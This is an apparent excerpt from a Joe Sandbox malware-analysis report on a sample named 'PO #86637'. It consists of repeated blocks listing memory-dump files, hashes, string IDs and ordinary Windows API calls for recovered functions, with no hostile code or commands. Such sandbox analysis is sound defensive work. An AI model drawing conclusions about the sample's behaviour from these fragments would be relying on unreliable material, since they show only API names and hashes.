                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: $<
                      • API String ID: 4104443479-428540627
                      • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                      • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                      • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                      • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID: \VH
                      • API String ID: 1682464887-234962358
                      • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                      • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                      • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                      • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID: \VH
                      • API String ID: 1682464887-234962358
                      • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                      • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                      • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                      • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID: \VH
                      • API String ID: 1682464887-234962358
                      • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                      • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                      • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                      • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume
                      • String ID: \VH
                      • API String ID: 2507767853-234962358
                      • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                      • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                      • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                      • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume
                      • String ID: \VH
                      • API String ID: 2507767853-234962358
                      • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                      • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                      • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                      • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                      APIs
                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: msctls_trackbar32
                      • API String ID: 3850602802-1010561917
                      • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                      • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                      • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                      • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                      • String ID: crts
                      • API String ID: 943502515-3724388283
                      • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                      • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                      • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                      • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                      APIs
                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                      • CoInitialize.OLE32(00000000), ref: 0046E505
                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                      • CoUninitialize.OLE32 ref: 0046E53D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                      • String ID: .lnk
                      • API String ID: 886957087-24824748
                      • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                      • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                      • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                      • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$LabelVolume
                      • String ID: \VH
                      • API String ID: 2006950084-234962358
                      • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                      • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                      • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                      • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • GetMenuItemInfoW.USER32 ref: 00449727
                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                      • DrawMenuBar.USER32 ref: 00449761
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$InfoItem$Draw_malloc
                      • String ID: 0
                      • API String ID: 772068139-4108050209
                      • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                      • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                      • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                      • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$_wcscpy
                      • String ID: 3, 3, 8, 1
                      • API String ID: 3469035223-357260408
                      • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                      • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                      • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                      • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                      APIs
                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: ICMP.DLL$IcmpCloseHandle
                      • API String ID: 2574300362-3530519716
                      • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                      • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                      • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                      • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                      APIs
                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: ICMP.DLL$IcmpCreateFile
                      • API String ID: 2574300362-275556492
                      • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                      • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                      • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                      • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                      APIs
                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: ICMP.DLL$IcmpSendEcho
                      • API String ID: 2574300362-58917771
                      • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                      • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                      • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                      • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 2574300362-4033151799
                      • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                      • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                      • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                      • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                      • API String ID: 2574300362-1816364905
                      • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                      • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                      • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                      • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
